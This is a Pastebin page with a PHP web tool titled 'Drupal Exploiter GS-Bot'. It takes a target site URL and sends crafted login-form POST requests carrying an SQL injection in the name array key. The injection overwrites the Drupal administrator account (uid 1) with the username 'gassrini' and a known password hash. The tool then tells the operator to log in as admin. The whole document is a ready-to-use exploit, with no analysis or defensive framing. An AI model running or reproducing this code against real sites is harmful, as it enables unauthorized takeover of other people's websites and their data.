SHARE
TWEET

GS-bot Drupal Exploit [Backup]

ToKeiChun Mar 13th, 2019 28 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!Doctype HTML>
  2. <html>
  3. <head>
  4.     <title>Drupal Exploiter GS-Bot |CODED FALLAGASSRINI</title>
  5.     <style type="text/css">
  6.     .mymargin{
  7.         margin-top:100px;
  8.         color:white;
  9.         font-family: monospace;
  10.     }
  11.     body{
  12.         background-color:black;
  13.     }
  14.     </style>
  15. </head>
  16. <body>
  17.     <div class="mymargin">
  18.         <center>
  19.     <form method="GET" action="">
  20.         Site : <input type="text" name="url" placeholder="Example: www.site.com">
  21.         <input type="submit" name="submit" value="submit">
  22.     </form>
  23.     <br>
  24. <?php
  25. error_reporting(0);
  26. if(isset($_GET['submit'])){
  27.  
  28.     $url = $_GET['url'];
  29.     $post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status
  30. %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  31.     $params = array(
  32.         'http' => array(
  33.         'method' => 'POST',
  34.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  35.         'content' => $post_data
  36.         )
  37.     );
  38.     $ctx = stream_context_create($params);
  39.     $data = file_get_contents($url . '/user/login/', null, $ctx);
  40.      echo "<h3>Testing at \"/user/login/</h3>\"";
  41.     if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
  42.         echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login";
  43.     } else {
  44.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
  45.     }
  46. }
  47.  
  48. if(isset($_GET['submit'])){
  49.  
  50.     $url = "http://".$_GET['url']."/";
  51.     $post_data = "name[0;update users set name %3D 'gassrini' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status
  52. %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  53.     $params = array(
  54.         'http' => array(
  55.         'method' => 'POST',
  56.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  57.         'content' => $post_data
  58.         )
  59.     );
  60.     $ctx = stream_context_create($params);
  61.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  62.      echo "<h3>Testing at \"Index</h3>\"";
  63.     if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  64.         echo "Success! Log in with username \"gassrini\" and password \"admin\" at {$url}/user/login";
  65.     } else {
  66.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
  67.     }
  68. }
  69.  
  70. ?>
  71.     </div>
  72.  
  73. </body>
  74. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top